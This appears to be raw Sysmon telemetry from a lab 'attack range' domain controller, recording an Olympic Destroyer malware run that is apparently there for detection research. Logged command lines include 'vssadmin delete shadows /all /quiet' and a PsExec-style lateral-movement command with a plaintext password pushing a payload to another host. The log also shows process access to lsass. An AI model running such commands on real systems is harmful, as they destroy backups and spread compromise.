10:56:41.811{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-12E9-6216-4F05-000000003802}69606972C:\Windows\system32\cmd.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.807{C8EA50B7-12E9-6216-5205-000000003802}7044C:\Windows\System32\vssadmin.exe10.0.14393.0 (rs1_release.160715-1616)Command Line Interface for Microsoft® Volume Shadow Copy Service Microsoft® Windows® Operating SystemMicrosoft CorporationVSSADMIN.EXEc:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=2964D232005BD840B38F9DB4F95DC7DB,SHA256=4FE71EB779B57354E5600DC31E3DC1875ADC8A06663654AEC83F11109751E8FC,IMPHASH=974DD2AFBD6D9BAE89608D1B181CCCF8{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet 10341000x8000000000000000290146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.795{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.780{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.791{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.780{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000290137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.419{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53560-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000290136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.711{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5005-000000003802}208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.711{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5005-000000003802}208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.680{C8EA50B7-12E9-6216-5005-000000003802}2082732C:\Windows\system32\conhost.exe{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.642{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-5005-000000003802}208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.642{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-5005-000000003802}208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-12E9-6216-4E05-000000003802}68686944C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+10af|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+1768|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+193c|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.629{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe" 10341000x8000000000000000290124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-4F05-000000003802}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.627{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0BA724D9960E5D498A40254AADD23F,SHA256=6C4D36F539F444EF0C1D6D87FECCD1188A4340CA46E7505AB3469F8297B3678D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.496{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C: